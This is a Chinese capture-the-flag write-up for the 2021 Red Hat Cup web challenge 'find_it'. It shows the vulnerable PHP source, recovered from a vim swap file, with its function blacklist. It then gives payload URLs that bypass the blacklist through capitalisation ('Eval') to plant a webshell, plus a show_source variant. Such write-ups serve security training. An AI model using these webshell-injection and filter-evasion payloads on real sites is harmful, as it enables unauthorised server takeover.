2021-第四届红帽杯网络安全大赛-Web-find_it_红帽杯2022 sandbox

2021-第四届红帽杯网络安全大赛-Web-find_it

题目

先用目录扫描工具爆破一下目录，发现了robots.txt

访问后有了提示 1ndexx.php

直接访问不到，需要访问vim的保存的缓冲类型文件.swp，访问之后获取到源码。

http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/.1ndexx.php.swp

把关键代码粘贴出来看一下运行流程

• 打开flag.php读取文件内容

• 打开hack.php文件，获取code参数

• 正则匹配危险函数

• 字符串长度不能超过33

• 将code参数的内容写入hack.php

• 将flag.php内容写入hack.php

<?php
#Really easy...
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET['code'];
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
 die("you die");
}
if(strlen($a)>33){
 die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);
fclose($file);
fclose($hack);
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

利用方式1：大小写过滤，利用Eval绕过eval限制，成功获取webshell

http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/index.php?code=%3C?php%20@Eval($_POST[%27aaa%27]);?%3E
使用菜刀工具连接hack.php

利用方式2：利用show_source高亮代码，再看代码的时候注意到flag.php里的内容会被写入到hack.php中，这样只需要高亮自己就可以看到flag了。
http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/index.php?code=%3C?php%20show_source(FILE);?%3E
不过这种方式我没有成功

参考：
https://www.jianshu.com/p/e17bf9e64e18